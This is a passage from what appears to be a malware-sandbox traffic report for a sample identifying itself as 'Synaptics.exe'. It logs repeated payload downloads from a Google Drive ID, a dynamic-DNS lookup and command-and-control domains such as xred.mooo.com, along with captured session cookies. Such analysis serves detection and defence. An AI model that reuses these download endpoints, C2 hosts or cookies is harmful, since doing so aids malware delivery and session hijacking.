                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global traffic
                            HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                User-Agent: MyApp
                                Host: freedns.afraid.org
                                Cache-Control: no-cache
                            Source: global traffic
                            DNS traffic detected: DNS query: filedn.com
                            Source: global traffic
                            DNS traffic detected: DNS query: docs.google.com
                            Source: global traffic
                            DNS traffic detected: DNS query: xred.mooo.com
                            Source: global traffic
                            DNS traffic detected: DNS query: freedns.afraid.org
                            Source: global traffic
                            DNS traffic detected: DNS query: drive.usercontent.google.com
                            Source: global traffic
                            HTTP traffic detected: HTTP/1.1 404 Not Found
                                X-GUploader-UploadID: AFiumC5CyZ8Ry0hRBMoQaKvjOLo-7dUnQ_6dON501F1RA2_qGz0yrgzbqh7k-I2fn4bIjLjb
                                Content-Type: text/html; charset=utf-8
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 30 Dec 2024 10:48:57 GMT
                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                Cross-Origin-Opener-Policy: same-origin
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Content-Security-Policy: script-src 'report-sample' 'nonce-cLrC06TI7cTFmOMkCSw2tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Length: 1652
                                Server: UploadServer
                                Set-Cookie: NID=520=O4iN5IOxf23kqpAqHJs_aF9KIEkavC4db8fvXtDOSh40Q7kbxnzU6nDxPE49KGn1Upx72cmG3NN0GTohw-johdvyQbL7l4JR3HuoUWf78GMDSGQhK9RxBNzIFRGHLMS8IY2iUnYPlfCloDF0QRl1r5wU1FU7L_3McvXp_ga72fpAgxvnLRCVeF0; expires=Tue, 01-Jul-2025 10:48:57 GMT; path=/; domain=.google.com; HttpOnly
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Content-Security-Policy: sandbox allow-scripts
                                Connection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7nq3ie3sCGiqAw6NBRXuADWysTFG4vtjmkwPjav_8PJwv5TtZvxIGM9bVk2o9THE73OM_7BsQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:20 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EP0hyBAuVZ_T3BJkXo8IqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC56cKeQm4BOcXEY4uZL58k4wMgbKVPNtAYUaqP45QFbEGoU7PQ7JyPSLEXpu3yUEinhTj3qh5gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:20 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-T31ncOEkBRHxaV7vhxfjuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, 